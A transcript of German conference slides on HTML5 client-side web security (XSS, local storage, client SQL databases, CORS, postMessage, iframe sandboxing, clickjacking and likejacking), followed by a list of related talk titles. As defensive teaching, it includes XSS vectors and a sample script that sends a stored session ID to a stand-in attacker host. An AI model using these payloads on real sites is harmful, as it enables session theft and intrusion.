Carsten Eilers / Client Security im Web 2.0 und mit HTML5

Größe: px
Ab Seite anzeigen:

Download "Carsten Eilers / www.ceilers-it.de. Client Security im Web 2.0 und mit HTML5"

Transkript

1 Carsten Eilers / Client Security im Web 2.0 und mit HTML5

2 Vorstellung Berater für IT-Sicherheit Web Security (Pentests, Beratung,...)... Autor PHP Magazin, Entwickler Magazin Blog: Schwachstellen- und Exploitsammlung

3 Agenda Vorbemerkungen HTML5 Clickjacking Buttonjacking Schlußbemerkungen

4 Es war einmal... (1) Ajax in Action 2007: AJAX, aber sicher! XSS und CSRF JavaScript Port Scanner Schwachstellenscanner Jikto JavaScript-Malware allgemein JavaScript-/JSON-Hijacking Fazit : Verhindern Sie XSS & CSRF

5 Es war einmal... (2) Ajax in Action 2008 Sicherheit und der Ajax-Client SQL-Injection via Client Angriffe auf Presentation Layer Look&Feel-Hacks Ganz neu: Clickjacking (Einzige) Gegenmaßnahme: Framebuster

6 HTML5 bringt Die Gegenwart neue Funktionen neue Attribute neue Tags Clickjacking & Likejacking sind Alltag

7 Was ist HTML5? Die nächste Version von HTML Fast eine Entwicklungsumgebung Drei Aspekte: Inhalt (HTML5) Präsentation (CSS) Interaktion mit dem Benutzer (JavaScript) Kein Standard / Work in progress

8 HTML5 & XSS Agenda Local Storage SQL-Datenbank Wurmkuren Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

9 HTML5 & XSS (1) Kein Standard => Jeder macht, was er will wie er will Unterschiedliche Interpretationen sind immer unsicher

10 HTML5 & XSS (2) Neue Tags z.b. audio- und video-tags: <audio src=1 onerror= alert(1) > <video src=1 onerror= alert(1) > Geänderte und neue Attribute für alte Tags z.b. Attribute in schließenden Tags: </a onmouseover= alert(1) >

11 HTML5 & XSS (3) z.b. autofocus-attribut: <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)>

12 HTML5 & XSS (4) autofocus-attribut bringt Element mit schädlichen Inhalt in den Focus poster- und srcdoc-attribut erlauben Verweis auf schädliche externe Ressourcen

13 HTML5 & XSS (5) SVG ist eine Grafik? SVG ist auch ein Einfallstor für XSS: <svg xmlns="http://www.w3.org/2000/svg"> <script>alert(1)</script> </svg> z.b. in Firefox < 4

14 HTML5 & XSS (6) Lange Liste im HTML5 Security Cheatsheet Insbesondere Blacklists gefährdet Auch Whitelists anpassen z.b. die früher harmlosen schließenden Tags wie </a>

15 HTML5 & XSS (7) Wann haben Sie das letzte Mal die Schutzmaßnahmen alter Anwendungen aktualisiert? Oder auch nur angesehen? Never touch a running system!???

16 Agenda HTML5 & XSS Local Storage SQL-Datenbank Wurmkuren Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

17 Local & Session Storage 5-10 MB Speicher als Key-Value-Paare (Cookie 4 KB) Inhalt wird nicht wie bei Cookies an den Server gesendet Session Storage an Fenster gebunden, Local Storage ist persistent

18 HTML5 & Local Storage (1) Zugriff an Hostname gebunden geocities.com/gute-seiten vs. geocities.com/boese-seiten Zugriff über XSS <script> document.write("<img src= 'http://angreifer.example/klau.php?geklaut= "+localstorage.getitem('sessionid')+"'>"); </script>

19 HTML5 & Local Storage (2) Zugriff durch Schadsoftware auf dem Client Zugriff durch andere Benutzer Z.B. Google Mail: Statt Cookies ausspähen o.ä. nun direkter Zugriff auf dem Client möglich

20 HTML5 & Local Storage (3) Wie erkennt man Angriffe? Lese-Zugriffe? - Gar nicht! Manipulationen? - Eigentlich auch nicht!

21 HTML5 & Local Storage (4) Beispiel Session-ID: Cookie mit HTTPOnly-Flag (und ggf. Secure-Flag) Local Storage JavaScript soll zugreifen können!

22 HTML5 & Local Storage (5) Immer daran denken: Daten sind unverschlüsselt, jeder auf dem Client kann darauf zugreifen Daten bleiben ewig erhalten, außer Benutzer oder Anwendung löscht

23 HTML5 & Local Storage (6) Schutzmaßnahmen: Keine Sensitiven Daten speichern Löschen nicht vergessen!

24 HTML5 & Local Storage (7) Verschlüsselung meist nutzlos sowieso nur Zeitschloss Schlüssel auf Client => Daten de fakto unverschlüsselt Schlüssel auf Server => keine Offline-Nutzung

25 HTML5 & XSS Local Storage SQL-Datenbank Agenda Wurmkuren Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

26 HTML5 & SQL-Datenbank (1) SQL-Datenbank auf dem Client => SQL-Injection betrifft auch den Client Prepared Statements statt zusammengesetzter Strings HTML5 Database API hilft

27 HTML5 & SQL-Datenbank (2) executesql("select spalte FROM tabelle WHERE wert=" + eingabe); executesql("select spalte FROM tabelle WHERE wert=?", [eingabe]); Eingabe kein String, sondern Literal 'nix' OR 1=1

28 HTML5 & SQL-Datenbank (3) Auch ohne SQL-Injection gefährdet Same Origin Policy schützt: Daten über HTTPS gespeichert => Zugriff nur über HTTPS möglich Besser als 'Secure'-Flag für Cookies, da automatisch

29 HTML5 & SQL-Datenbank (4) Same Origin Policy schützt nicht vor XSS... bei DNS-Hijacking... bei Manipulation der lokalen Namensauflösung... bei MitM-Angriff

30 HTML5 & SQL-Datenbank (5) Zufällige Namen erschweren Zugriffe eindeutig, aber nicht erratbar Onlinenutzung: Auf Server speichern Offlinenutzung: Offline-Passwort + Benutzername = Datenbankname

31 HTML5 & SQL-Datenbank (6) Wie erkennt man Angriffe? Gar nicht (siehe Local Storage)

32 HTML5 & Speicher (1) Client-Daten können Schadcode enthalten Auf Server prüfen ist selbstverständlich Auf Client gegen XSS kodieren z.b. mit OWASP Enterprise Security API (owasp-esapi-js) JavaScript-Funktion kann überschrieben werden!

33 HTML5 & Speicher (2) Egal ob Local Storage oder SQL-DB: Speichern Sie erst nach Zustimmung des Benutzers! Gilt nur für den aktuellen Rechner den sie nicht an vorhandener DB erkennen Besser: Allgemein gültige DB-Tabelle enthält letzte Session-ID Vergleich mit Wert auf dem Server

34 HTML5 & XSS Local Storage SQL-Datenbank Wurmkuren Agenda Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

35 HTML5 & Wurmkuren (1) Ein XSS-Wurm verbreitet sich über unsere Webanwendung Bisher: Schwachstelle beheben, Wurmcode auf dem Server löschen, Wurm tot

36 HTML5 & Wurmkuren (2) Ein XSS-Wurm verbreitet sich über unsere Webanwendung Jetzt: Schwachstelle beheben, Wurmcode auf dem Server löschen, Wurmcode auf den Clients löschen, Wurm tot Wirklich?

37 HTML5 & Wurmkuren (3) Wie lange dauert es, bis sich alle Benutzer mal wieder angemeldet haben? Bis dahin Gefahr bei Offline-Nutzung Was ist, wenn der Wurm weiteren Schadcode nachlädt?

38 HTML5 & XSS Local Storage SQL-Datenbank Wurmkuren Session Storage Agenda Cross Origin Requests postmesssage() iframe im Sandkasten

39 HTML5 & Session Storage (1) Wie Local Storage, aber auf Session- Dauer beschränkt Same Origin Policy schützt: Zugriffe an Domain, Protokoll, Port gebunden Kein Schutz vor XSS, aber vor böser Umgebung

40 HTML5 & Session Storage (2) Löschen nicht vergessen! Beispiel Webmail, mehrere Tabs offen In einem wird sich ausgeloggt Andere bleiben offen Darin Zugriff auf Session Storage möglich

41 HTML5 & Session Storage (3) Mögliche Lösung: Cookie enthält aktuellen Status Nach Einloggen Cookie-Wert, Datum und Uhrzeit in den Session Storage Bei jedem Zugriff Werte vergleichen Cookie ist immer & überall aktuell

42 HTML5 & XSS Local Storage SQL-Datenbank Wurmkuren Session Storage Agenda Cross Origin Requests postmesssage() iframe im Sandkasten

43 HTML5 & Cross Origin (1) Cross Origin Requests hebeln Same Origin Policy aus Einschränkung über 'Access-Control- Allow-Origin'-Header Ein '*' - und die Anwendung ist offen für alle Vorsicht vor Vereinfachungen (z.b. eingebundene Konfigurationsdatei)

44 HTML5 & Cross Origin (2) 'Origin'-Header nicht vertrauenswürdig! if ($_SERVER['HTTP_ORIGIN'] == "[Server]") { header('access-control-allow-origin: [Server]'); // Ausgabe vertraulicher Informationen } else { // Ausgabe harmloser Informationen } zusätzlich Authentifizierung nötig

45 HTML5 & Cross Origin (3) Authentifizierung: Signalisiert über 'Access-Control-Allow-Credentials'- Header z.b. in Antwort auf Preflight-Request Cross Origin Request mit 'Credentials'- Flag und Authentifizierungsdaten

46 HTML5 & Cross Origin (4) Vertrauen, wem Vertrauen gebührt! Website, die Request sendet, vertraut auf korrekte Antwort Website, die Request empfängt, vertraut auf Autorisierung Was ist mit kompromittiertem Server?

47 HTML5 & Cross Origin (5) Bösartige Requests Jeder kann Cross Origin Request senden Nur vor komplizierten Requests Prüfung mit Preflight-Request Browser prüfen nur, ob auf Antwort zugegriffen werden darf

48 HTML5 & Agenda XSS Local Storage SQL-Datenbank Wurmkuren Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

49 HTML5 & postmessage() (1) Ziel: Daten zwischen Skripten aus verschiedenen Domains austauschen Aufruf mit Daten und Domain des Ziels Nützlich für Widgets Früher: Eingesperrt in iframe oder offen im script-tag Nun: Sicherheit des iframes, Kommunikation des script-tag

50 HTML5 & postmessage() (2) Sicherheit: Browser liefert Daten nur aus, wenn Domain stimmt Datenleck nicht möglich Zieldomain genau angeben, nicht als '*' Aber woher kommen die Daten? Absender im origin-attribut prüfen XSS?

51 HTML5 & Agenda XSS Local Storage SQL-Datenbank Wurmkuren Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

52 HTML5 & iframe-sandbox (1) Neu: sandbox-attribut für iframes beschränkt Möglichkeiten für iframes Per Default kein Zugriff auf DOM der einbettenden Seite, Cookies, Local Storage kein JavaScript-Code, keine Plugins, keine Formulare Gezieltes Aufheben möglich

53 HTML5 & iframe-sandbox (2) allow-same-origin iframe wird wie aus eigener Domain behandelt allow-top-navigation Oberste Ebene des akt. Inhalts ändern allow-forms Formulare sind zulässig allow-skripts Skripte erlaubt, Zugriff auf Umgebung möglich

54 HTML5 & iframe-sandbox (3) Zusätzliche Sicherheitsmaßnahme Scheitert XSS-Filter, schützt Sandbox vor eingeschleustem Code Abgestuftes Freigeben von Funktionen Werbung in iframe ohne Rechte (Schutz vor kompromittiertem Adserver) Widgets in iframe mit JavaScript- Ausführung...

55 Clickjacking & sein Hintergrund Agenda Texte in Textfelder einfügen Texte kopieren HTML-Quelltext kopieren Schutzmaßnahmen

56 Clickjacking (1) Veröffentlicht 2008 von Jeremiah Grossmann und Robert Hansen Opfer auf Seite des Angreifers locken Opfer klickt etwas an Klick landet in unsichtbaren iframe mit anderer Website

57 Adobes Settings Manager

58

59

60

61 Agenda Clickjacking & sein Hintergrund Texte in Textfelder einfügen Texte kopieren HTML-Quelltext kopieren Schutzmaßnahmen

62 HTML5 & Clickjacking (1) Black Hat Europe 2010: Paul Stone kombiniert Clickjacking und HTML5 Fragment-Identifier erleichtern das Zielen Drag&Drop-API erlaubt mehr als das Entführen von Klicks

63 HTML5 & Clickjacking (2) Texte in Textfelder einfügen Opfer verschiebt Objekt auf bösartiger Website Beim Start wird Text des Angreifers über Drag&Drop- API ausgewählt Nun unsichtbaren iframe mit angegriffenen Formular unter Mauszeiger legen Beim Fallen lassen landet der Text im Formular Beliebig oft wiederholen, Senden durch Clickjacking

64 Clickjacking & Agenda sein Hintergrund Texte in Textfelder einfügen Texte kopieren HTML-Quelltext kopieren Schutzmaßnahmen

65 HTML5 & Clickjacking (3) Texte kopieren Same Origin Policy verhindert Zugriff auf Inhalte von anderen Domains, z.b. in iframes Lösung: Drag&Drop-API und Clickjacking

66 HTML5 & Clickjacking (4) unsichtbarer iframe am Mauszeiger gewünschtes Dokument in den iframe Opfer muss Verschiebe-Operation starten (Maustaste drücken) Dokument so pos., das Ende unter Mauszeiger Benutzer muss Maus etwas bewegen (Text auswählen) Benutzer muss Maustaste loslassen

67 HTML5 & Clickjacking (5) Text ist nun selektiert Dokument so pos., das selektierter Text unter Mauszeiger liegt Drag&Drop-Aktion: Text in Textfeld einfügen, s.o. Angreifer kann Text z.b. über getdata() lesen oder Formular abschicken

68 HTML5 & Clickjacking (6) Angreifer bestimmt Positionen Kann einfach ganze (unbekannte) Seite kopieren Auch Zugriff auf Browser-Plugins möglich

69 HTML5 & Clickjacking (7) Alles nur Theorie? Mai 2011: Cookiejacking im IE Schwachstelle im Sicherheitsmodell: file:// erlaubt Zugriff auf lokale Dateien Konkret: Die Cookies Cookies in iframe laden Text mit Clickjacking kopieren Schwachstelle im IE behoben

70 Agenda Clickjacking & sein Hintergrund Texte in Textfelder einfügen Texte kopieren HTML-Quelltext kopieren Schutzmaßnahmen

71 HTML5 & Clickjacking (8) HTML-Quelltexte kopieren Für Angreifer interessant: versteckte Formularfelder etc. Editorfunktionen für HTML helfen (contenteditable-attribut) Text in entsprechenden Bereich auf Angreifer-Seite verschieben

72 HTML5 & Clickjacking (9) Ergebnisse unterschiedlich: IE und Firefox: Alles zwischen ersten und letztem sichtbaren Element Webkit-Browser, z.b. Chrome: Nur sichtbare Elemente, aber inkl. Attributen wie IDs, Klassen, URLs

73 Clickjacking & Agenda sein Hintergrund Texte in Textfelder einfügen Texte kopieren HTML-Quelltext kopieren Schutzmaßnahmen

74 HTML5 & Clickjacking (10) Framebuster schützt vor Clickjacking: <script type="text/javascript"> if (top!=self) top.location.href=self.location.href; </script> Framebuster lassen sich u.u. umgehen z.b. im IE mit eingeschränkter Zone

75 HTML5 & Clickjacking (11) Framebuster schützte vor Clickjacking: iframe mit Sandbox-Attribut verhindert Ausführung Einziger Schutz: "X-FRAME-OPTIONS"-Header

76 Agenda Vorbemerkungen HTML5 Clickjacking Buttonjacking Schlussbemerkungen

77 Buttonjacking (1) Mai 2010: Erster Clickjacking-Angriff auf Facebooks Like -Button Neuer Name: Likejacking Seitdem liegt Facebook quasi unter Dauerbeschuss

78 Buttonjacking (2) Problem des Like-Buttons: Er soll eingebunden werden Weder Framebuster noch "X-FRAME- OPTIONS"-Header möglich Facebook bekämpft nur Symptome (bekannte Angriffe)

79 Buttonjacking (3) Wieso Likejacking? Betroffen sind alle derartigen Buttons Sommer 2011: Twitters Follow -Button Googles 1+ -Button

80 Buttonjacking (4) Logische Schlussfolgerung: Vergessen Sie 1-Klick-Buttons, Verlangen Sie eine Bestätigung

81 Agenda Vorbemerkungen HTML5 Clickjacking Buttonjacking Schlussbemerkungen

82 Schlussbemerkungen Application Cache: Cache Poisoning ist möglich Websockets: Böse Netzverkverbindungen aus dem Browser heraus, z.b. BEAST (kurzzeitig) Zugriff auf Webcam: Angreifer schaut Ihnen zu...

83 Fragen?

84 Vielen Dank für Ihre Aufmerksamkeit Material und Links auf

85 The End

Ajax, aber sicher! Carsten Eilers

Ajax, aber sicher! Carsten Eilers Ajax, aber sicher! Carsten Eilers Berater für IT-Sicherheit Autor About Security Standpunkt Sicherheit Schwachstellen-Datenbank Security Aktuell auf entwickler.de Vorstellung Carsten Eilers, www.ceilers-it.de

Mehr

Einführung in Web-Security

Einführung in Web-Security Einführung in Web-Security Alexander»alech«Klink Gulaschprogrammiernacht 2013 Agenda Cross-Site-Scripting (XSS) Authentifizierung und Sessions Cross-Site-Request-Forgery ([XC]SRF) SQL-Injections Autorisierungsprobleme

Mehr

When your browser turns against you Stealing local files

When your browser turns against you Stealing local files Information Security When your browser turns against you Stealing local files Eine Präsentation von Alexander Inführ whoami Alexander Inführ Information Security FH. St Pölten Internet Explorer Tester

Mehr

Netzwerksicherheit Übung 9 Websicherheit

Netzwerksicherheit Übung 9 Websicherheit Netzwerksicherheit Übung 9 Websicherheit David Eckhoff, Tobias Limmer, Christoph Sommer Computer Networks and Communication Systems Dept. of Computer Science, University of Erlangen-Nuremberg, Germany

Mehr

Sicherheit in Webanwendungen CrossSite, Session und SQL

Sicherheit in Webanwendungen CrossSite, Session und SQL Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery

Mehr

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Gefahr durch Cookies. Antonio Kulhanek. Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity.

Gefahr durch Cookies. Antonio Kulhanek. Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity. Gefahr durch Cookies Antonio Kulhanek Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity.ch Rechtliche Hinweise Art. 143 StGB Unbefugte Datenbeschaffung

Mehr

web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Montag, 14. Mai 12

web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Montag, 14. Mai 12 Hochschule Niederrhein University of Applied Sciences Elektrotechnik und Informatik Faculty of Electrical Engineering and Computer Science web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Inhalt

Mehr

Aktuelle Sicherheitsprobleme im Internet

Aktuelle Sicherheitsprobleme im Internet Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt

Mehr

Sicherheit in Rich Internet Applications

Sicherheit in Rich Internet Applications Sicherheit in Rich Internet Applications Florian Kelbert 14.02.2008 Seite 2 Sicherheit in Rich Internet Applications Florian Kelbert 14.02.2008 Inhaltsverzeichnis Grundlagen Ajax und Mashups Adobe Flash-Player

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt

Mehr

Erste Hilfe. «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet?

Erste Hilfe. «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet? Erste Hilfe «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet? Cache Einstellungen Im Internet Explorer von Microsoft wie auch in anderen Browsern (zum Beispiel Firefox) gibt

Mehr

Mashups, aber sicher. Carsten Eilers

Mashups, aber sicher. Carsten Eilers Mashups, aber sicher Carsten Eilers Vorstellung Berater für IT-Sicherheit Autor About Security Standpunkt Sicherheit Buch Ajax Security und anderes... Schwachstellen-Datenbank Security Aktuell auf entwickler.de

Mehr

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn Aktuelle Angriffstechniken Steffen Tröscher cirosec GmbH, Heilbronn Gliederung Angriffe auf Webanwendungen Theorie und Live Demonstrationen Schwachstellen Command Injection über File Inclusion Logische

Mehr

Carsten Eilers / www.ceilers-it.de. Sicherheit von Anfang an

Carsten Eilers / www.ceilers-it.de. Sicherheit von Anfang an Carsten Eilers / www.ceilers-it.de Sicherheit von Anfang an Vorstellung Berater für IT-Sicherheit Web Security (Pentests, Beratung,...)... Autor PHP Magazin, Entwickler Magazin Blog: www.ceilers-news.de...

Mehr

Carsten Eilers www.ceilers-it.de. Pentesters Toolbox

Carsten Eilers www.ceilers-it.de. Pentesters Toolbox Carsten Eilers www.ceilers-it.de Pentesters Toolbox Vorstellung Berater für IT-Sicherheit Autor PHP Magazin, Entwickler Magazin Buch Ajax Security www.ceilers-news.de und anderes... Schwachstellen-Datenbank

Mehr

Welche Gefahren gehen vom Firmenauftritt im Internet aus?

Welche Gefahren gehen vom Firmenauftritt im Internet aus? Die Webseite als Eintrittspunkt Welche Gefahren gehen vom Firmenauftritt im Internet aus? Bekannt gewordene Schwachstellen & Angriffe Bekannt gewordene Schwachstellen & Angriffe Quelle: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/

Mehr

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink Hacker-Methoden in der IT- Sicherheitsausbildung Dr. Martin Mink Hacker-Angriffe 3.11.2010 Hacker-Methoden in der IT-Sicherheitsausbildung Dr. Martin Mink 2 Typische Angriffe auf Web- Anwendungen SQL Injection

Mehr

PHP Einsteiger Tutorial Kapitel 4: Ein Email Kontaktformular in PHP Version 1.0 letzte Änderung: 2005-02-03

PHP Einsteiger Tutorial Kapitel 4: Ein Email Kontaktformular in PHP Version 1.0 letzte Änderung: 2005-02-03 PHP Einsteiger Tutorial Kapitel 4: Ein Email Kontaktformular in PHP Version 1.0 letzte Änderung: 2005-02-03 Bei dem vierten Teil geht es um etwas praktisches: ein Emailformular, dass man auf der eigenen

Mehr

XSS for fun and profit

XSS for fun and profit 5. Chemnitzer Linux-Tag 1.-2.- März 2003 XSS for fun and profit Theorie und Praxis von Cross Site Scripting (XSS) Sicherheitslücken, Diebstahl von Cookies, Ausführen von Scripten auf fremden Webservern,

Mehr

AJAX DRUPAL 7 AJAX FRAMEWORK. Was ist das Ajax Framework? Ein typischer Ablauf eines Ajax Requests Die Bestandteile des Ajax Frameworks.

AJAX DRUPAL 7 AJAX FRAMEWORK. Was ist das Ajax Framework? Ein typischer Ablauf eines Ajax Requests Die Bestandteile des Ajax Frameworks. DRUPAL 7 AJAX FRAMEWORK Was ist das Ajax Framework? Ein typischer Ablauf eines Ajax Requests Die Bestandteile des Ajax Frameworks AJAX Beispiele Fragen: Gibt es jemanden der noch gar keine Erfahrungen

Mehr

Benutzerhandbuch. Gästebuch Software - YellaBook v1.0 http://www.yellabook.de. Stand: 01.08.2012. by YellaBook.de - Alle Rechte vorbehalten.

Benutzerhandbuch. Gästebuch Software - YellaBook v1.0 http://www.yellabook.de. Stand: 01.08.2012. by YellaBook.de - Alle Rechte vorbehalten. Benutzerhandbuch Gästebuch Software - YellaBook v1.0 http://www.yellabook.de Stand: 01.08.2012 Inhalt 1 Funktionen... 3 2 Systemanforderungen... 4 3 Installation... 4 4 Einbinden des Gästebuchs... 5 5

Mehr

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter Datensicherheit Vorlesung 5: 15.5.2015 Sommersemester 2015 h_da, Lehrbeauftragter Inhalt 1. Einführung & Grundlagen der Datensicherheit 2. Identitäten / Authentifizierung / Passwörter 3. Kryptografie 4.

Mehr

Sicherheit von Webapplikationen Sichere Web-Anwendungen

Sicherheit von Webapplikationen Sichere Web-Anwendungen Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt

Mehr

Session Management und Cookies

Session Management und Cookies LMU - LFE Medieninformatik Blockvorlesung Web-Technologien Wintersemester 2005/2006 Session Management und Cookies Max Tafelmayer 1 Motivation HTTP ist ein zustandsloses Protokoll Je Seitenaufruf muss

Mehr

2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST

2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST 2. Interaktive Web Seiten GET und POST Die Übertragungsmethoden GET und POST sind im http Protokoll definiert: POST: gibt an, dass sich weitere Daten im Körper der übertragenen Nachricht befinden: z.b.

Mehr

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 The OWASP Foundation http://www.owasp.org Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 Tobias Glemser tobias.glemser@owasp.org tglemser@tele-consulting.com Ralf Reinhardt

Mehr

Surfen, aber sicher! Basisschutz leicht gemacht. 10 Tipps für ein ungetrübtes Surf-Vergnügen

Surfen, aber sicher! Basisschutz leicht gemacht. 10 Tipps für ein ungetrübtes Surf-Vergnügen Surfen, aber sicher! Basisschutz leicht gemacht 10 Tipps für ein ungetrübtes Surf-Vergnügen Ins Internet mit Sicherheit! Viele nützliche und wichtige Dienstleistungen werden heute über das Internet in

Mehr

Wordpress am eigenen Server installieren

Wordpress am eigenen Server installieren Wordpress am eigenen Server installieren Voraussetzung: Zugang zum Server und einen Datenbanknamen und Datenbankuser 1. Download der aktuellen Wordpress-Version unter http://wpde.org/download/ Die Installation

Mehr

itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 2013 OneConsult GmbH www.oneconsult.com

itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 2013 OneConsult GmbH www.oneconsult.com itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 13.03.2013 Agenda Vorstellung Open Web Application Security Project (OWASP) Die OWASP Top 10 (2013 RC1) OWASP Top 3 in der

Mehr

Advanced Web Hacking. Matthias Luft Security Research mluft@ernw.de

Advanced Web Hacking. Matthias Luft Security Research mluft@ernw.de Advanced Web Hacking Matthias Luft Security Research mluft@ernw.de ERNW GmbH. Breslauer Str. 28. D-69124 Heidelberg. www.ernw.de 6/23/2010 1 ERNW GmbH Sicherheitsdienstleister im Beratungs- und Prüfungsumfeld

Mehr

Angreifbarkeit von Webapplikationen

Angreifbarkeit von Webapplikationen Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre

Mehr

Aktuelle Angriffstechniken auf Web-Applikationen. Andreas Kurtz cirosec GmbH, Heilbronn

Aktuelle Angriffstechniken auf Web-Applikationen. Andreas Kurtz cirosec GmbH, Heilbronn Aktuelle Angriffstechniken auf Web-Applikationen Andreas Kurtz cirosec GmbH, Heilbronn Gliederung Schwachstellen-Überblick Präsentation aktueller Angriffstechniken XPath-Injection Cross-Site Request Forgery

Mehr

TYPO3-Kurzreferenz für Redakteure

TYPO3-Kurzreferenz für Redakteure TYPO3-Kurzreferenz für Redakteure Die Kurzreferenz orientiert sich weitgehend an den TYPO3 v4 Schulungsvideos. Es kann jedoch geringfügige Abweichungen geben, da in den Videos auf didaktisch sinnvolles

Mehr

Web Applications Vulnerabilities

Web Applications Vulnerabilities Bull AG Wien Web Applications Vulnerabilities Philipp Schaumann Dipl. Physiker Bull AG, Wien www.bull.at/security Die Problematik Folie 2 Der Webserver ist das Tor zum Internet auch ein Firewall schützt

Mehr

Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen

Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen Sebastian Schinzel Virtual Forge GmbH University of Mannheim SAP in a Nutshell Weltweit führendes Unternehmen für

Mehr

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus?

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Web Hacking - Angriffe und Abwehr

Web Hacking - Angriffe und Abwehr Web Hacking - Angriffe und Abwehr UNIX-Stammtisch 31. Januar 2012 Frank Richter Holger Trapp Technische Universität Chemnitz Universitätsrechenzentrum Motivation (1): Für uns Lehrveranstaltung: Techniken

Mehr

HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH

HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH Dr. Stefan Schlott, BeOne Stuttgart GmbH ABOUT.TXT Stefan Schlott, BeOne Stuttgart GmbH Java-Entwickler, Scala-Enthusiast, Linux-Jünger Seit jeher begeistert

Mehr

OpenWAF Web Application Firewall

OpenWAF Web Application Firewall OpenWAF Web Application Firewall Websecurity und OpenWAF in 60 Minuten Helmut Kreft Fuwa, 15.11.2010 Agenda Webapplikationen? Furcht und Schrecken! OWASP Top 10 - Theorie und Praxis mit dem BadStore Umgang

Mehr

> Internet Explorer 8

> Internet Explorer 8 > Internet Explorer 8 Browsereinstellungen optimieren Übersicht Inhalt Seite 1. Cache und Cookies löschen 2. Sicherheits- und Datenschutzeinstellungen 2 5 Stand Juli 2009 1. Cache und Cookies löschen Jede

Mehr

Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen. OWASP Nürnberg, 13.10.09

